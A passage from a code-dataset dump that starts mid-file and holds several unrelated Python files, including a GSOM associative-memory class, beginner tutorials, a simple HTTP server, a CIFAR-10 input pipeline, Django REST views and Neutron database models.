@learning_rate.setter\n def learning_rate(self, value):\n self._map1.learning_rate = value\n self._map2.learning_rate = value\n\n @property\n def neighborhood_update(self):\n return 0.5 * (self._map1.neighborhood_update\n + self._map2.neighborhood_update)\n\n @neighborhood_update.setter\n def neighborhood_update(self, value):\n self._map1.neighborhood_update = value\n self._map2.neighborhood_update = value\n\n @property\n def neighborhood_insert(self):\n return 0.5 * (self._map1.neighborhood_insert\n + self._map2.neighborhood_insert)\n\n @neighborhood_insert.setter\n def neighborhood_insert(self, value):\n self._map1.neighborhood_insert = value\n self._map2.neighborhood_insert = value\n\n def train(self, stimulus1, stimulus2):\n # Train the two GSOMs with the two stimuli.\n bmu1, direction1 = self._map1.train(stimulus1)\n bmu2, direction2 = self._map2.train(stimulus2)\n\n # Expand the hebbian connections if necessary.\n direction1 is not None and self._hebbian.expand(bmu1, direction1, index=1)\n direction2 is not None and self._hebbian.expand(bmu2, direction2, index=2)\n\n # Train the hebbian connections.\n w1, h1 = self._map1.size\n w2, h2 = self._map2.size\n activation1 = gaussian_field(w1, h1, 1, bmu1, 0.5).reshape((w1, h1))\n activation2 = gaussian_field(w2, h2, 1, bmu2, 0.5).reshape((w2, h2))\n self._hebbian.train(activation1, activation2)\n\n def activate(self, input_stimulus, input_index):\n input_map, output_map = self._get_maps(input_index)\n\n if isinstance(self._hebbian, FakeHebbian):\n return input_map.get_bmu_for_stimulus(input_stimulus)\n else:\n input_activation = input_map.activate(input_stimulus)\n output_activation = self._hebbian.activate(\n input_activation, input_index)\n return output_map.get_bmu_for_activation(output_activation)\n\n def evaluation(self, categories1, categories2):\n # Get list of BMUs and hit map for all categories.\n category1_bmus = self._bmus_for_categories(categories1, 1)\n category2_hits = self._hits_for_categories(categories1, 1)\n category2_bmus = self._bmus_for_categories(categories2, 2)\n category1_hits = self._hits_for_categories(categories2, 2)\n\n # If not using Hebbian connections, we switch the hit maps to simulate\n # activation on the map itself.\n if isinstance(self._hebbian, FakeHebbian):\n tmp_hits = category1_hits\n category1_hits = category2_hits\n category2_hits = tmp_hits\n\n # Calculate confusion matrices and generalization factors.\n cm1 = self._confusion_matrix(category1_bmus, category1_hits)\n cm2 = self._confusion_matrix(category2_bmus, category2_hits)\n gen1 = np.sum(np.diag(cm1) >= 0.8) / len(cm1)\n gen2 = np.sum(np.diag(cm2) >= 0.8) / len(cm2)\n\n return (\n # Confusion matrix.\n (\n cm1,\n cm2,\n ),\n # Hit map.\n (\n self._hit_map(category1_hits, 1),\n self._hit_map(category2_hits, 2),\n ),\n # Hit count.\n (\n self._hit_count(category1_hits, 1),\n self._hit_count(category2_hits, 2),\n ),\n # Average percent correct.\n (\n np.sum(np.diag(cm1)) / len(cm1),\n np.sum(np.diag(cm2)) / len(cm2),\n ),\n # Percent generalization factors.\n (\n gen1,\n gen2,\n ),\n # Taxonomic factor (generalization factors average).\n 0.5 * (gen1 + gen2),\n )\n\n def _bmus_for_categories(self, categories, input_index):\n input_map, output_map = self._get_maps(input_index)\n bmus = [[] for i in range(len(categories))]\n for category_index, stimuli in enumerate(categories):\n for stimulus in stimuli:\n bmu = input_map.get_bmu_for_stimulus(stimulus)\n bmus[category_index].append(bmu)\n return bmus\n\n def _hits_for_categories(self, categories, input_index):\n hits = dict()\n for category_index, stimuli in enumerate(categories):\n for stimulus in stimuli:\n bmu = self.activate(stimulus, input_index)\n if bmu not in hits:\n hits[bmu] = np.zeros(len(categories))\n hits[bmu][category_index] += 1\n return hits\n\n def _confusion_matrix(self, category_bmus, category_hits):\n matrix = []\n\n for category_index, bmus in enumerate(category_bmus):\n hits = np.zeros(len(category_bmus))\n for bmu in bmus:\n if bmu in category_hits:\n hits += category_hits[bmu]\n else:\n distance_hits = [(distance(bmu_hit, bmu), h)\n for bmu_hit, h in category_hits.items()]\n min_distance = np.min([d for d, h in distance_hits])\n distance_hits = np.stack(\n [h for d, h in distance_hits if d <= min_distance])\n hits += np.sum(distance_hits, axis=0) / len(distance_hits)\n matrix.append(hits / max(1, np.sum(hits)))\n\n return np.stack(matrix)\n\n def _hit_map(self, category_hits, input_index):\n input_map, output_map = self._get_maps(input_index)\n\n hit_map = np.zeros(input_map.size)\n for bmu, hits in category_hits.items():\n hit_map[bmu] = hits.argmax() + 1\n return hit_map\n\n def _hit_count(self, category_hits, input_index):\n input_map, output_map = self._get_maps(input_index)\n\n hit_count = np.zeros(input_map.size)\n for bmu, hits in category_hits.items():\n hit_count[bmu] = np.count_nonzero(hits)\n return hit_count\n\n def _get_maps(self, input_index):\n maps = [self._map1, self._map2]\n map_index = input_index - 1\n if isinstance(self._hebbian, FakeHebbian):\n return (maps[map_index], maps[map_index])\n else:\n return (maps[map_index], maps[1 - map_index])\n","sub_path":"lib/model/associative_memory.py","file_name":"associative_memory.py","file_ext":"py","file_size_in_byte":7136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"282506213","text":"version = \"0.1.0001\"\nprint(version)\nfrom setuptools import setup, find_packages\n\nsetup(\n name='test_release3',\n version=version,\n author='Aleksander Cwikla',\n url=\"https://github.com/acwikla-novela/test_release3\",\n packages=find_packages(),\n description='Testing auto-release',\n platforms='Posix; MacOS X; Windows',\n python_requires='==3.7.4',\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"227393736","text":"students = ['paul', 'george', 'ringo', 'john']\ngrades = [100,90,50,70]\n\nidx = students.index('ringo')\nprint(grades[idx])\n\n# declare\nstugrades = {\n 'paul': 100,\n 'george': 90,\n 'ringo': 50,\n 'john': 70\n}\n\n# read / access\nprint(stugrades['ringo'])\n\n# add\nstugrades['pete'] = 105\n\n# modify / update\nstugrades['pete'] = 100\n\n# delete\ndel stugrades['george']\ndel stugrades['john']\ndel stugrades['george'], stugrades['john'] # one liner\n\nlist(stugrades.keys())\nlist(stugrades) # synonymous\nlist(stugrades.values())\n\nprint('paul' in stugrades)\nprint(100 in stugrades)\nprint(100 in stugrades.values())\n\n\n# CHESS BOARD\n\nboard = {\n 'a1': 'R+', 'b1': 'N+', 'c1': 'B+', 'd1': 'K+',\n 'a2': '', 'b2': '', 'c2': '', 'd2': '',\n 'a3': '', 'b3': '', 'c3': '', 'd3': '',\n 'a4': 'R-', 'b4': 'N-', 'c4': 'B-', 'd4': 'Q+',\n}\nboard['b2']\n\n# move b1 to b2\nboard['b2'] = board['b1']\nboard['b1'] = ''\n\n\n# --------------------\n# | K* | ...\n\nbtempl = '''\n+----+----+----+----+\n|{a1:^4}|{b1:^4}|{c1:^4}|{d1:^4}|\n+----+----+----+----+\n|{a2:^4}|{b2:^4}|{c2:^4}|{d2:^4}|\n+----+----+----+----+\n|{a3:^4}|{b3:^4}|{c3:^4}|{d3:^4}|\n+----+----+----+----+\n|{a4:^4}|{b4:^4}|{c4:^4}|{d4:^4}|\n+----+----+----+----+\n'''\nprint(btempl.format_map(board))\n\n# move b4 to b3\nboard['b3'] = board['b4']\nboard['b4'] = ''\nprint(btempl.format_map(board))\n\n\n# C# had if (expr) { ..... }\nval = 3\nif val == 3:\n print('val is equal to 3')\n print('yeah!!!')\nelif val == 4:\n print('val is equal to 4')\n print('yeah!!!')\nelse:\n print('val is NOT equal to 3 or 4')\n print('booooooo!')\nprint('DONE!!')\n\n# boolean operators\n# ==, !=, >, <, >=, <=, in, not in, is, is not\n\n","sub_path":"C/0129.py","file_name":"0129.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"451616686","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport glob\nimport pickle as pkl\nfrom collections import namedtuple\nimport bayesiantests as bt\n\n# Define named tuple that was used to store results.\ncomparePair = namedtuple('comparePair', 'algorithm1 algorithm2 scores')\n\n# Set rope and rho values.\nrope=0.01\nrho=1.0/10.0\n\n# Go over stored results dictionaries in folder.\nfor results in glob.glob('*.p'):\n\n # Load next results dictionary.\n with open(results, 'rb') as f:\n results_nxt = pkl.load(f)\n\n # Go over pair comparisons in dictionary.\n for results_idx in results_nxt.keys():\n nxt_pair = results_nxt[results_idx]\n names = (nxt_pair.algorithm1, nxt_pair.algorithm2)\n scores = nxt_pair.scores\n msk = np.logical_not(np.apply_along_axis(lambda x: np.all(x == 0), 1, scores))\n scores = scores[msk, :]\n\n # Compute probabilities.\n pleft, prope, pright = bt.hierarchical(scores,rope,rho)\n with open('results_bhctt.res', 'a') as f:\n f.write('{0}, {1}, {2}, {3}, {4}\\n'.format(nxt_pair.algorithm1, nxt_pair.algorithm2, pleft, prope, pright))\n\n # Sample posterior and make simplex plot.\n samples=bt.hierarchical_MC(scores,rope,rho, names=('MultiSURF', 'MultiSURF*'))\n fig = bt.plot_posterior(samples, names)\n plt.savefig(nxt_pair.algorithm1 + '_' + nxt_pair.algorithm2 + '.png')\n\n","sub_path":"evaluation_results/bayesian_hierarchical_correlated_t_test.py","file_name":"bayesian_hierarchical_correlated_t_test.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"124898426","text":"import random\r\n\r\nnum1 = random.randint(0,999)\r\nnum2 = random.randint(0,999)\r\n\r\ndef main():\r\n print(' ', num1)\r\n print('+', num2)\r\n ans = int(input('Enter your answer: '))\r\n check_answer(num1, num2, ans)\r\n\r\ndef check_answer(num1, num2, ans):\r\n if num1 + num2 == ans:\r\n print('Congrat!! Your answer is correct!!!')\r\n else:\r\n print('Wrong answer!! The answer is', num1 + num2)\r\nmain()\r\n","sub_path":"Chap 5/Exercise/math_quiz.py","file_name":"math_quiz.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"550291495","text":"#!/usr/bin/python3.5\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport threading, pickle, re, subprocess, urllib, pathlib\n\n\nclass MyHandler(BaseHTTPRequestHandler):\n def do_GET(self):\n f_type_map = {'.html': 'text/html', '.css': 'text/css', '.ico': 'image/x-icon', '.jpg': 'image/jpeg',\n '.png': 'image/png', '.js': 'application/javascript'}\n t_type = re.compile('\\/|(\\.\\w*)')\n r_file = self.path.split('?')\n requested_type = t_type.findall(self.path)\n ex = requested_type[-1]\n if ex != '.py':\n res = 200\n fileToSend = None\n hds = []\n root = pathlib.PurePath('/home/jack/onedrive/LaptopProjects/LED science project/files')\n f = root.joinpath(r_file[0].strip('/'))\n if not pathlib.Path(f).exists():\n res = 404\n elif pathlib.Path(f).is_dir():\n if pathlib.Path(f / 'index.html').exists():\n f = f / 'index.html'\n with open(str(f), 'r') as file:\n fileToSend = file.read()\n hds.append(('content-type', 'text/html'))\n else:\n res = 404\n else:\n try:\n with open(str(f), 'r') as file:\n fileToSend = file.read()\n hds.append(('content-type', f_type_map[ex]))\n except UnicodeDecodeError:\n with open(str(f), 'rb') as file:\n fileToSend = file.read()\n hds.append(('content-type', f_type_map[ex]))\n if res == 200:\n self.send_response(res)\n else:\n self.send_error(res)\n for item in hds:\n i1, i2 = item\n self.send_header(i1, i2)\n self.end_headers()\n if fileToSend is not None:\n try:\n self.wfile.write(fileToSend.encode('utf-8'))\n except AttributeError:\n self.wfile.write(fileToSend)\n return\n else:\n try:\n with open('C:\\\\Users\\jackt.JACK-IS-AWESOME\\OneDrive\\LaptopProjects\\LED science project\\\\files\\params.dat', 'wb') as file:\n d = dict()\n for pair in list(r_file[1].split('&')):\n key, value = pair.split('=')\n d[key] = str(value)\n pickle.dump(d, file)\n except IndexError:\n pass\n self.send_response(200)\n self.send_header('Content-Type', 'text/html')\n self.end_headers()\n file = subprocess.run(['python3.5', '/home/jack/projects/server/files%s' % r_file[0]],\n stdout=subprocess.PIPE)\n self.wfile.write(file.stdout)\n\n def do_POST(self):\n pass\n\n def do_OPTIONS(self):\n methods = ['GET', 'POST', 'PUT', 'HEAD', 'DELETE', 'CONNECT', 'OPTIONS', 'TRACE']\n sup_methods = []\n self.send_response(200)\n for m in methods:\n if hasattr(self, 'do_' + m):\n sup_methods.append(m)\n else:\n pass\n print(sup_methods)\n meth = ', '.join(sup_methods)\n self.send_header('Allow', meth)\n self.end_headers()\n\n\naddresses = list()\n\naddresses.append(('localhost', 9898))\n\n\ndef run():\n print('starting server ...')\n httpd = HTTPServer(addresses[0], MyHandler)\n try:\n httpd.serve_forever()\n except KeyboardInterrupt:\n pass\n\n\n'''def run1():\n httpd = HTTPServer(addresses[1], MyHandler)\n try:\n httpd.serve_forever()\n except KeyboardInterrupt:\n pass'''\n\n\nbg_server = threading.Thread(target=run)\n#bg_server1 = threading.Thread(target=run1)\nif __name__ == '__main__':\n bg_server.start()\n# bg_server1.start()\n for addr in addresses:\n print('\\nserver started at %s:%s' % addr)\n","sub_path":"local/Science-Project/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"196120210","text":"# Засько Богдан\n# КНИТ16-А\n# №18; Последовательность чисел Фибоначчи, конечное из которых не более чем\n# целое число N\n\nwhile True:\n N=input(\"Введите целый ограничитель для числа Фибоначчи: \")\n if N.isdigit():\n N=int(N)\n y=[1,1]\n for i in range(2,N):\n y.append(y[i-2]+y[i-1])\n if y[i]>=N:\n y.remove(y[i])\n break\n print(\"Последовательность Фибоначчи\",y )\n print()\n else:\n print(\"Введите целое положительное число!\")\n cont=input(\"Для продолжения введите yes, для завершения любое другое значение \\n\")\n if cont==\"yes\":\n print(\"\")\n continue\n else:\n break\n","sub_path":"laba5/18.py","file_name":"18.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"381679222","text":"import random\r\n\r\nRow = int(input(\"How many heads in a row?\"))\r\nTries = 0\r\nHeads = 0\r\nwhile Heads < Row:\r\n Coin = random.randrange(0, 2)\r\n if Coin == 0:\r\n Heads = 0\r\n elif Coin == 1:\r\n Heads += 1\r\n Tries += 1\r\n\r\nprint(\"It took\", Tries, \"tries.\")\r\n","sub_path":"Further Coin Test.py","file_name":"Further Coin Test.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"641731949","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom django.core.files.uploadedfile import UploadedFile\nfrom django.conf import settings\nfrom django.http import HttpResponse\nfrom rest_framework import generics\nfrom rest_framework.exceptions import NotFound\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ViewSet\nfrom rest_framework import mixins\nfrom rest_framework import viewsets\nfrom rest_framework.exceptions import PermissionDenied\nfrom django.contrib.auth.models import User\n\nfrom heritages.models import Heritage, Multimedia, Annotation\nfrom heritages.search import search_heritages, search_annotations\nfrom heritages.serializers import HeritageSerializer, MultimediaSerializer, AnnotationSerializer, UserSerializer, \\\n AnnotationPaleSerializer\nfrom heritages.permissions import IsOwner, IsNotAnonymous, IsSelf\n\n\nclass HeritagesListView(generics.ListCreateAPIView):\n queryset = Heritage.objects.all()\n serializer_class = HeritageSerializer\n\n def list(self, request, *args, **kwargs):\n keyword = self.request.query_params.get(\"keyword\", None)\n if not keyword:\n return super().list(request, *args, **kwargs)\n\n result = Response(search_heritages(keyword)).data\n return Response(i[\"_source\"] for i in result[\"hits\"][\"hits\"])\n\n\nclass HeritageView(generics.RetrieveUpdateDestroyAPIView):\n queryset = Heritage.objects.all()\n serializer_class = HeritageSerializer\n\n\nclass MultimediaListView(generics.ListCreateAPIView):\n serializer_class = MultimediaSerializer\n\n def get_queryset(self):\n try:\n heritage = Heritage.objects.get(pk=self.kwargs[\"heritage_id\"])\n except ObjectDoesNotExist:\n raise NotFound()\n return heritage.multimedia\n\n def perform_create(self, serializer):\n heritage_id = self.kwargs[\"heritage_id\"]\n try:\n heritage = Heritage.objects.get(pk=heritage_id)\n except ObjectDoesNotExist:\n raise NotFound()\n return serializer.save(heritage=heritage)\n\n\nclass MultimediaView(generics.RetrieveDestroyAPIView):\n queryset = Multimedia.objects.all()\n serializer_class = MultimediaSerializer\n\n\nclass MultimediaFileView(ViewSet):\n\n @staticmethod\n def get_file(request, multimedia_id):\n try:\n m = Multimedia.objects.get(pk=multimedia_id)\n except ObjectDoesNotExist:\n raise NotFound(multimedia_id)\n file = UploadedFile(m.file)\n return HttpResponse(file, content_type=\"image/png\")\n\n\nclass AnnotationListView(generics.ListCreateAPIView):\n serializer_class = AnnotationSerializer\n\n def get_queryset(self):\n queryset = Annotation.objects.all()\n heritage_id = self.kwargs[\"heritage_id\"]\n if heritage_id is not None:\n queryset = queryset.filter(target__target_id__contains=heritage_id)\n return queryset\n else:\n return NotFound()\n\n def get_serializer_context(self):\n return {\"target_id\": self.request.build_absolute_uri(),\n \"heritage_id\": self.kwargs[\"heritage_id\"]}\n\n def list(self, request, *args, **kwargs):\n keyword = self.request.query_params.get(\"keyword\", None)\n if not keyword:\n return super().list(request, *args, **kwargs)\n\n result = Response(search_annotations(keyword)).data\n return Response(i[\"_source\"] for i in result[\"hits\"][\"hits\"])\n\n\nclass AnnotationPaleListView(generics.ListCreateAPIView):\n serializer_class = AnnotationPaleSerializer\n\n def get_queryset(self):\n return Annotation.objects.all()\n\n def get_serializer_context(self):\n return {\"target_id\": self.request.build_absolute_uri()}\n\n def list(self, request, *args, **kwargs):\n keyword = self.request.query_params.get(\"keyword\", None)\n if not keyword:\n return super().list(request, *args, **kwargs)\n\n result = Response(search_annotations(keyword)).data\n return Response(i[\"_source\"] for i in result[\"hits\"][\"hits\"])\n\n\nclass AnnotationView(generics.RetrieveUpdateDestroyAPIView):\n queryset = Annotation.objects.all()\n serializer_class = AnnotationSerializer\n\n\nclass AnnotationPaleView(generics.RetrieveUpdateDestroyAPIView):\n queryset = Annotation.objects.all()\n serializer_class = AnnotationPaleSerializer\n\n\nclass Users(mixins.CreateModelMixin, viewsets.GenericViewSet):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n\nclass UserDetail(mixins.RetrieveModelMixin,\n mixins.UpdateModelMixin,\n viewsets.GenericViewSet):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n permission_classes = (IsSelf,)\n\n def get_me(self, request):\n return Response(self.serializer_class(request.user).data)\n","sub_path":"heritago/heritages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"31049190","text":"def FormShow(form, parameter):\r\n uipJC = form.GetUIPartByName('uipJournalCode')\r\n uipJC.Edit()\r\n uipJC.mode = parameter.FirstRecord.mode\r\n \r\n #cek mode string tag parameter\r\n if uipJC.mode == 'new':\r\n sCaption = 'Tambah Baru '\r\n elif uipJC.mode == 'edit':\r\n sCaption = 'Koreksi '\r\n form.GetControlByName('pData.JournalCode_Id').Readonly = 1\r\n form.GetControlByName('pData.JournalCode_Id').Color = -2147483624\r\n elif uipJC.mode == 'view':\r\n sCaption = 'Lihat Detil '\r\n form.GetPanelByName('pData').SetAllControlsReadOnly()\r\n \r\n #pengaturan button\r\n form.GetControlByName('pButton.btnOK').Enabled = 0\r\n form.GetControlByName('pButton.btnOK').Default = 0\r\n form.GetControlByName('pButton.btnCancel').Caption = '&Tutup'\r\n form.GetControlByName('pButton.btnCancel').Default = 1\r\n \r\n form.Caption = sCaption + form.Caption\r\n \r\ndef btnOKClick(sender):\r\n uipJC = sender.OwnerForm.GetUIPartByName('uipJournalCode')\r\n savedMode = uipJC.mode\r\n \r\n #cek field yang perlu diisi\r\n if uipJC.JournalCode_Id in [None,'']:\r\n sender.OwnerForm.ShowMessage('Kode Jurnal wajib diisi.\\nMohon isi terlebih dahulu.')\r\n return\r\n\r\n sender.OwnerForm.CommitBuffer()\r\n try:\r\n sender.OwnerForm.PostResult()\r\n sender.OwnerForm.ResetAndClearData()\r\n \r\n if savedMode == 'edit':\r\n sender.ExitAction = 1\r\n else:\r\n #mode new, kembalikan lagi nilai mode\r\n uipJC.Edit()\r\n uipJC.mode = savedMode\r\n sender.OwnerForm.GetControlByName('pData.JournalCode_Id').SetFocus()\r\n\r\n except:\r\n raise\r\n","sub_path":"dialogs/master/fKodeJurnal_intr.py","file_name":"fKodeJurnal_intr.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"111501803","text":"import pickle\nimport numpy as np\nimport tensorflow as tf\n\n'''返回的dict是一个包含0-9数字的list列表,如[0,2,4,6,3,5,...,4,2,5]'''\n\n\ndef unpickle(file):\n with open(file, 'rb') as fo:\n dict = pickle.load(fo, encoding='latin1')\n return dict\n\n\n'''将上面的dict转换成对应的one-hot矩阵,shape=[n_sample,n_class]'''\n\n\ndef onehot(labels):\n n_sample = len(labels) # 数据集的数量\n n_class = max(labels) + 1 # one_hot分类的数量\n onehot_labels = np.zeros((n_sample, n_class))\n onehot_labels[np.arange(n_sample), labels] = 1\n return onehot_labels\n\n\ndef get_train():\n # 训练数据集\n data1 = unpickle('./data/cifar-10-batches-py/data_batch_1')\n data2 = unpickle('./data/cifar-10-batches-py/data_batch_2')\n data3 = unpickle('./data/cifar-10-batches-py/data_batch_3')\n data4 = unpickle('./data/cifar-10-batches-py/data_batch_4')\n data5 = unpickle('./data/cifar-10-batches-py/data_batch_5')\n\n x_train = np.concatenate((data1['data'], data2['data'], data3['data'], data4['data'], data5['data']), axis=0)\n y_train = np.concatenate((data1['labels'], data2['labels'], data3['labels'], data4['labels'], data5['labels']),\n axis=0)\n # 转换格式\n y_train = onehot(y_train)\n return x_train, y_train\n\n\ndef get_test():\n # 测试集\n test = unpickle('./data/cifar-10-batches-py/test_batch')\n x_test = test['data']\n y_test = onehot(test['labels'])\n return x_test, y_test\n\n\nx_train, y_train = get_train()\nx_test, y_test = get_test()\n\n\ndef image_train_change(image, label):\n image = tf.cast(image, tf.float32)\n image = tf.reshape(image, [3, 32, 32])\n image = tf.transpose(image, [1, 2, 0])\n # 图片随机剪裁\n image = tf.random_crop(image, [24, 24, 3])\n # 图片随机翻转\n image = tf.image.random_flip_left_right(image)\n # 图片随机调整亮度\n image = tf.image.random_brightness(image, max_delta=63)\n # 图片随机调整对比度\n image = tf.image.random_contrast(image, lower=0.2, upper=1.8)\n # 归一化处理\n image = tf.image.per_image_standardization(image)\n return image, label\n\n\ndef next_train_batch(batch_size=128):\n dataset = tf.data.Dataset.from_tensor_slices((x_train, y_train))\n dataset = dataset.map(image_train_change, num_parallel_calls=10)\n dataset = dataset.prefetch(-1)\n dataset = dataset.repeat().batch(batch_size, drop_remainder=True)\n iteration = dataset.make_one_shot_iterator()\n one_element = iteration.get_next()\n return one_element[0], one_element[1]\n\n\ndef image_test_change(image, label):\n image = tf.cast(image, tf.float32)\n image = tf.reshape(image, [3, 32, 32])\n image = tf.transpose(image, [1, 2, 0])\n # 图片随机剪裁\n image = tf.image.resize_image_with_crop_or_pad(image, 24, 24)\n # 归一化处理\n image = tf.image.per_image_standardization(image)\n return image, label\n\n\ndef next_test_batch(batch_size=len(x_test)):\n dataset = tf.data.Dataset.from_tensor_slices((x_test, y_test))\n dataset = dataset.map(image_test_change, num_parallel_calls=10)\n dataset = dataset.prefetch(-1)\n dataset = dataset.repeat().batch(batch_size, drop_remainder=True)\n iteration = dataset.make_one_shot_iterator()\n one_element = iteration.get_next()\n return one_element[0], one_element[1]\n","sub_path":"Cifar/worker 6/input/input_32.py","file_name":"input_32.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"13765403","text":"from threading import RLock\ntry:\n from collections.abc import Mapping as DictMixin\nexcept ImportError: # Python < 3.3\n try:\n from UserDict import DictMixin # Python 2\n except ImportError: # Python 3.0-3.3\n from collections import Mapping as DictMixin\n\n\n# With lazy loading, we might end up with multiple threads triggering\n# it at the same time. We need a lock.\n_fill_lock = RLock()\n\n\nclass LazyDict(DictMixin):\n \"\"\"Dictionary populated on first use.\"\"\"\n data = None\n\n def __getitem__(self, key):\n if self.data is None:\n _fill_lock.acquire()\n try:\n if self.data is None:\n self._fill()\n finally:\n _fill_lock.release()\n return self.data[key.upper()]\n\n def __contains__(self, key):\n if self.data is None:\n _fill_lock.acquire()\n try:\n if self.data is None:\n self._fill()\n finally:\n _fill_lock.release()\n return key in self.data\n\n def __iter__(self):\n if self.data is None:\n _fill_lock.acquire()\n try:\n if self.data is None:\n self._fill()\n finally:\n _fill_lock.release()\n return iter(self.data)\n\n def __len__(self):\n if self.data is None:\n _fill_lock.acquire()\n try:\n if self.data is None:\n self._fill()\n finally:\n _fill_lock.release()\n return len(self.data)\n\n def keys(self):\n if self.data is None:\n _fill_lock.acquire()\n try:\n if self.data is None:\n self._fill()\n finally:\n _fill_lock.release()\n return self.data.keys()\n\n\nclass LazyList(list):\n \"\"\"List populated on first use.\"\"\"\n\n _props = [\n '__str__', '__repr__', '__unicode__',\n '__hash__', '__sizeof__', '__cmp__',\n '__lt__', '__le__', '__eq__', '__ne__', '__gt__', '__ge__',\n 'append', 'count', 'index', 'extend', 'insert', 'pop', 'remove',\n 'reverse', 'sort', '__add__', '__radd__', '__iadd__', '__mul__',\n '__rmul__', '__imul__', '__contains__', '__len__', '__nonzero__',\n '__getitem__', '__setitem__', '__delitem__', '__iter__',\n '__reversed__', '__getslice__', '__setslice__', '__delslice__']\n\n def __new__(cls, fill_iter=None):\n\n if fill_iter is None:\n return list()\n\n # We need a new class as we will be dynamically messing with its\n # methods.\n class LazyList(list):\n pass\n\n fill_iter = [fill_iter]\n\n def lazy(name):\n def _lazy(self, *args, **kw):\n _fill_lock.acquire()\n try:\n if len(fill_iter) > 0:\n list.extend(self, fill_iter.pop())\n for method_name in cls._props:\n delattr(LazyList, method_name)\n finally:\n _fill_lock.release()\n return getattr(list, name)(self, *args, **kw)\n return _lazy\n\n for name in cls._props:\n setattr(LazyList, name, lazy(name))\n\n new_list = LazyList()\n return new_list\n\n# Not all versions of Python declare the same magic methods.\n# Filter out properties that don't exist in this version of Python\n# from the list.\nLazyList._props = [prop for prop in LazyList._props if hasattr(list, prop)]\n\n\nclass LazySet(set):\n \"\"\"Set populated on first use.\"\"\"\n\n _props = (\n '__str__', '__repr__', '__unicode__',\n '__hash__', '__sizeof__', '__cmp__',\n '__lt__', '__le__', '__eq__', '__ne__', '__gt__', '__ge__',\n '__contains__', '__len__', '__nonzero__',\n '__getitem__', '__setitem__', '__delitem__', '__iter__',\n '__sub__', '__and__', '__xor__', '__or__',\n '__rsub__', '__rand__', '__rxor__', '__ror__',\n '__isub__', '__iand__', '__ixor__', '__ior__',\n 'add', 'clear', 'copy', 'difference', 'difference_update',\n 'discard', 'intersection', 'intersection_update', 'isdisjoint',\n 'issubset', 'issuperset', 'pop', 'remove',\n 'symmetric_difference', 'symmetric_difference_update',\n 'union', 'update')\n\n def __new__(cls, fill_iter=None):\n\n if fill_iter is None:\n return set()\n\n class LazySet(set):\n pass\n\n fill_iter = [fill_iter]\n\n def lazy(name):\n def _lazy(self, *args, **kw):\n _fill_lock.acquire()\n try:\n if len(fill_iter) > 0:\n for i in fill_iter.pop():\n set.add(self, i)\n for method_name in cls._props:\n delattr(LazySet, method_name)\n finally:\n _fill_lock.release()\n return getattr(set, name)(self, *args, **kw)\n return _lazy\n\n for name in cls._props:\n setattr(LazySet, name, lazy(name))\n\n new_set = LazySet()\n return new_set\n\n# Not all versions of Python declare the same magic methods.\n# Filter out properties that don't exist in this version of Python\n# from the list.\nLazySet._props = [prop for prop in LazySet._props if hasattr(set, prop)]\n","sub_path":"contrib/python/pytz/pytz/lazy.py","file_name":"lazy.py","file_ext":"py","file_size_in_byte":5404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"111206041","text":"# Copyright (c) 2016 Cisco Systems Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom neutron.db import models_v2\nfrom neutron_lib.db import model_base\nimport sqlalchemy as sa\nfrom sqlalchemy import orm\nfrom sqlalchemy.sql.expression import true\n\nfrom gbpservice.neutron.extensions import cisco_apic\nfrom gbpservice.neutron.extensions import cisco_apic_l3\n\n\nclass NetworkExtensionDb(model_base.BASEV2):\n\n __tablename__ = 'apic_aim_network_extensions'\n\n network_id = sa.Column(\n sa.String(36), sa.ForeignKey('networks.id', ondelete=\"CASCADE\"),\n primary_key=True)\n external_network_dn = sa.Column(sa.String(1024))\n nat_type = sa.Column(sa.Enum('distributed', 'edge', ''))\n svi = sa.Column(sa.Boolean)\n bgp_enable = sa.Column(sa.Boolean, default=False, nullable=False)\n bgp_type = sa.Column(sa.Enum('default_export', ''),\n default='default_export',\n nullable=False)\n bgp_asn = sa.Column(sa.String(64), default='0', nullable=False)\n\n network = orm.relationship(models_v2.Network,\n backref=orm.backref(\n 'aim_extension_mapping', lazy='joined',\n uselist=False, cascade='delete'))\n nested_domain_name = sa.Column(sa.String(1024), nullable=True)\n nested_domain_type = sa.Column(sa.String(1024), nullable=True)\n 